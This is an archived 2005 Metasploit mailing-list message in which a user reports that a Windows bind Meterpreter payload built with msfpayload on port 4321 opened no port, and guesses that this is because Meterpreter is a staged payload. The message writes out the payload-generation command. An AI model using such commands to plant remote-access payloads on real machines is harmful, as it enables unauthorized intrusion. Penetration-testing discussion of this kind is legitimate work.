Metasploit mailing list archives

using Meterpreter , out of MSF

From: elite_netbios at yahoo.com (Hamid . K)
Date: Wed, 26 Oct 2005 03:03:33 -0700 (PDT)

Hi

Thank you both for answers ,
but , I guess something is wrong here with
me , or the method HDM mentioned :

$ ./msfpayload win32_bind_meterpreter LPORT=4321 X
Warning: Multistage payloads only return first stage

as meterpreter is a staged one , I guess this error is
the reason of my failed test :)
after running generated excuteable file , no port is
opened , nor meterpreter client can connect to box.

I`ll keep trying ...

regards
Hamid.